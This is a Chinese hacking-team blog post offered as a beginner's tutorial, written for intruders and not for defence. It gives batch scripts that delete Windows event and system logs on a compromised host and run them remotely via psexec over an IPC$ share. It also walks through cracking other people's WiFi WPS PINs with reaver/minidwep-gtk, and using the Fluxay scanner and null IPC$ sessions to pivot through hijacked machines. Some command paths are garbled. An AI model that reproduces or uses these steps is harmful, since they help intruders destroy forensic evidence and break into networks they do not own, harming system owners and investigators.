清除入侵记录的小白教程

By 团队成员——断羽
一、清除入侵痕迹教程:
   1、在记事本中写入以下代码:
@del c:\windows\system32\logfiles\*.*
@del c:\windows \system32\config\*.evt
@del c:\windows \system32\dtclog\*.*
@del c:\windows \system32\*.log
@del c:windows \system32\*.txt
@del c:windows \*.txt
@del c:windows t\*.log
@del c:\del.bat
↗将以上代码保存为“del.bat”

   2、再新建一个批处理文件,保存为clear.bat
代码为:
@copy del.bat \\1\c$
@echo 向肉鸡复制本机的del.bat……OK
@psexec \\1 c:\del.bat
@echo 在肉鸡上运行del.bat,清除日志文件……OK
   3、如果你与IP地址为192.168.1.1的主机进行了IPC连接后,只需在命令行中输入
clear.bat 192.168.1.1
再按回车即可清除入侵痕迹


  二、.利用Liunx抓包破解WiFi密码
这里是用Windows电脑,因为暂时还没买Linux
  1、再Windows电脑中下一个虚拟机,在虚拟机中安装Linux操作系统(这里以VMware Workstation虚拟机为例)
百度搜索一下,找到VM虚拟机,安装完成后运行虚拟机,在程序主见面中点“创建新的虚拟机”,

  2、选择典型,单击下一步
单击浏览按钮,选择CDLiunx,下一步

  3、选择linux操作系统,版本:Ubuntu 下一步

  4、然后虚拟机名称你随便输,最大磁盘选10好点,下一步

  5、下一步

  6、启动虚拟机然后你可以在Windows主机中下个WiFi万能钥匙连接其他WiFi,因为你要破解的是PIN码,这个你必须得和其他WiFi处于连接状态。
连接好了别人的WiFi后点击“虚拟机”,“选择可移动设备”,“选择网络配置器”,连接

   7、打开minidwep-gtk
加密方式根据WiFi加密类型来选择,比如我这是WPA/WPA2的加密方式,我就选这个

   8、选好后点击扫描,找到含有WPS的无线网络,看不到就点击reaver

   9、单击ok有数据变化说明是WPS加密方式,可破解

   10、单击启动这时会提示你是否用字典穷举解密,点击ok选择最后一项字典文件

   11、等待破解成


三、利用流光实现远程跳板代理攻击

1、安装流光(下载地址:https://www.netXeyes.com/yy/Fluxay5.zip)

2、打开流光,选择“扫描POP3/FTP/NT/SQL主机”然后自己选择扫描的开始地址已经起始地址,主机类型选择NT/98   点击确定按钮

3、扫描完成后可查看扫描结果

4、返回,在“IPC$主机”下所扫描出的主机选一个右击,选择“探测”,再选择“探测IPC$用户列表”

5、勾选“仅探测Administrators组的用户”,单击是

6、代理跳板架设通过3389远程登录自己的肉鸡,打开cmd,输入以下命令

net use \\192.168.1.1(假设选择了扫描IP地址为192.168.1.1的用户组)""/user:"Administrator"


即可建立空连接

By 团队成员——断羽
本博客所有文章如无特别注明均为原创。作者:幽冥狼族团队复制或转载请以超链接形式注明转自 幽冥狼族团队博客
原文地址《清除入侵记录的小白教程
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)